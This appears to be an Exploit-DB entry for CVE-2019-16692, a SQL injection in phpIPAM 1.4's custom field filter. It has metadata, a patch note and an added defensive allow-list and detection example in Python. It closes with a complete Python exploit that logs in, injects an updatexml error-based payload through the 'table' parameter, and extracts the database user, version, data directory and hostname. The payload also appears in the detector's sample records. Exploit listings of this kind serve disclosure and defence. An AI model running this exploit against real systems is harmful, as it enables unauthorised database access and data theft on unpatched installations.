Vendor: phpIPAM
By: Kevin Kirsche
CVSS: 9.8 (CRITICAL)
CWE: CWE-89 (SQL Injection)
Product Name: phpIPAM
Affected Version From: 1.4
Affected Version To: 1.4
Patch Exists: YES
CVE: CVE-2019-16692
CPE: a:phpipam:phpipam:1.4
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu 18.04 / MariaDB 10.4
Year: 2019

phpIPAM Custom Field Filter SQL Injection

This exploit lets an authenticated attacker execute arbitrary SQL statements against the database behind a vulnerable phpIPAM 1.4 instance. The flaw is in the custom field filter feature: the 'table' parameter of the 'filter-result.php' page is placed into a SQL query without being validated, so a crafted value changes the structure of the query instead of naming a table. The script below uses an error-based technique (an XPATH error raised by updatexml) to read the result of each injected subquery back out of the application's error message.

Mitigation:

The vendor has released a patch to address this vulnerability. Users should upgrade to the latest version of phpIPAM.
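A defender-side illustration of the fix, added here as an example and not code from phpIPAM or from the exploit author: a table name supplied by a client is treated as an identifier that must match a strict pattern and sit on an allow-list, otherwise the request is rejected before any query is built. The allow-list of table names, the query shape and the request records are all constructed assumptions for this example; phpIPAM's real table list and logging format are not on this page. The same validator doubles as a detection check over logged requests to the filter endpoint.

```python
import re

# Constructed allow-list of identifiers the filter endpoint is expected to accept.
# This is an assumption for the example, not phpIPAM's actual table list.
ALLOWED_TABLES = frozenset({"users", "subnets", "ipaddresses", "vlans", "vrf", "devices"})

# A bare SQL identifier: letters, digits and underscores only. Backticks, quotes,
# spaces, '#' and ';' cannot be part of a safe table name and are rejected outright.
IDENTIFIER_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def validate_table_name(value: str) -> bool:
    """Return True only if `value` is a well-formed identifier on the allow-list.

    Structural check first, then membership: a value that passes both can be
    interpolated into a query as a table name without altering the statement.
    """
    return bool(IDENTIFIER_RE.match(value)) and value in ALLOWED_TABLES


def build_filter_query(table: str) -> str:
    """Hardened counterpart of concatenating a user-supplied table name into SQL.

    Raises ValueError instead of producing a query when the name fails validation,
    so a crafted `table` value never reaches the database. (The query text is a
    placeholder shape for the example, not phpIPAM's own query.)
    """
    if not validate_table_name(table):
        raise ValueError(f"rejected table identifier: {table!r}")
    return f"SELECT * FROM `{table}` WHERE 1=1"


# Constructed sample request records in the shape a reverse proxy or WAF might log
# (client address, path, and the submitted `table` field); not real phpIPAM output.
SAMPLE_REQUESTS = [
    {"src": "10.0.0.5", "path": "/app/admin/custom-fields/filter-result.php", "table": "users"},
    {"src": "10.0.0.5", "path": "/app/admin/custom-fields/filter-result.php", "table": "vlans"},
    {"src": "10.0.0.9", "path": "/app/admin/custom-fields/filter-result.php",
     "table": "users`where 1=(updatexml(1,concat(0x3a,(select 1)),1))#`"},
    {"src": "10.0.0.9", "path": "/app/admin/custom-fields/filter-result.php", "table": "users; drop"},
]


def flag_suspicious_requests(records):
    """Return (src, table) for each filter-result.php request whose `table` fails validation.

    A legitimate client only ever sends allow-listed identifiers, so any rejected
    value on this endpoint is worth an alert regardless of the exact payload syntax.
    """
    return [
        (r["src"], r["table"])
        for r in records
        if r["path"].endswith("/custom-fields/filter-result.php")
        and not validate_table_name(r["table"])
    ]


if __name__ == "__main__":
    for src, value in flag_suspicious_requests(SAMPLE_REQUESTS):
        print(f"[!] {src} sent a rejected table identifier: {value!r}")
```

The pattern-plus-allow-list approach is deliberately stricter than escaping: escaping a backtick would stop this particular payload, but an allow-list also stops a valid identifier naming a table the feature was never meant to expose.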

Exploit-DB raw data:

#!/usr/bin/env python3
# Exploit Title: phpIPAM Custom Field Filter SQL Injection
# Exploit Announcement Date: September 16, 2019 5:18 AM
# Exploit Creation Date: September 27, 2019
# Exploit Author: Kevin Kirsche
# Vendor Homepage: https://phpipam.net
# Software Link: https://github.com/phpipam/phpipam/archive/1.4.tar.gz
# Version: 1.4
# Tested on: Ubuntu 18.04 / MariaDB 10.4
# Requires:
#   Python 3
#   requests package
# CVE: CVE-2019-16692

# For more details, view:
# https://github.com/phpipam/phpipam/issues/2738
# https://github.com/kkirsche/CVE-2019-16692

# Example Output
# [+] Executing select user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select system_user()
# [*] Received: phpipam@172.18.0.4
# [+] Executing select @@version
# [*] Received: .4.8-MariaDB-1:10.4.8+maria~b
# [+] Executing select @@datadir
# [*] Received: /var/lib/mysq
# [+] Executing select @@hostname
# [*] Received: ubuntu


from requests import Session

host = "localhost"
login_url = f"http://{host}/app/login/login_check.php"
exploit_url = f"http://{host}/app/admin/custom-fields/filter-result.php"

credentials = {
    "ipamusername": "Admin",
    "ipampassword": "Password",
}

payload = {
    "action": "add",
    "table": "",
}


cmds = {
    "unpriv": [
        "select user()",
        "select system_user()",
        "select @@version",
        "select @@datadir",
        "select @@hostname",
    ]
}

if __name__ == "__main__":
    # Authenticate first: the injectable endpoint lives under /app/admin and
    # requires a logged-in session.
    client = Session()
    resp = client.post(login_url, data=credentials)
    if resp.status_code == 200:
        for cmd in cmds["unpriv"]:
            print(f"[+] Executing {cmd}")
            # The result of the injected subquery is surfaced through the
            # XPATH syntax error message that updatexml() raises.
            payload["table"] = f"users`where 1=(updatexml(1,concat(0x3a,({cmd})),1))#`"
            resp = client.post(exploit_url, data=payload)
            # str.removeprefix/removesuffix (Python 3.9+) strip the literal surrounding
            # markup. The original lstrip/rstrip treated their argument as a character
            # set and also ate leading/trailing characters of the result, which is why
            # the example output above shows ".4.8-MariaDB" and "/var/lib/mysq".
            info = resp.text.removeprefix("<div class='alert alert-danger'>SQLSTATE[HY000]: General error: 1105 XPATH syntax error: ':").removesuffix("'</div><div class='alert alert-success'>Filter saved</div>")
            print(f"[*] Received: {info}")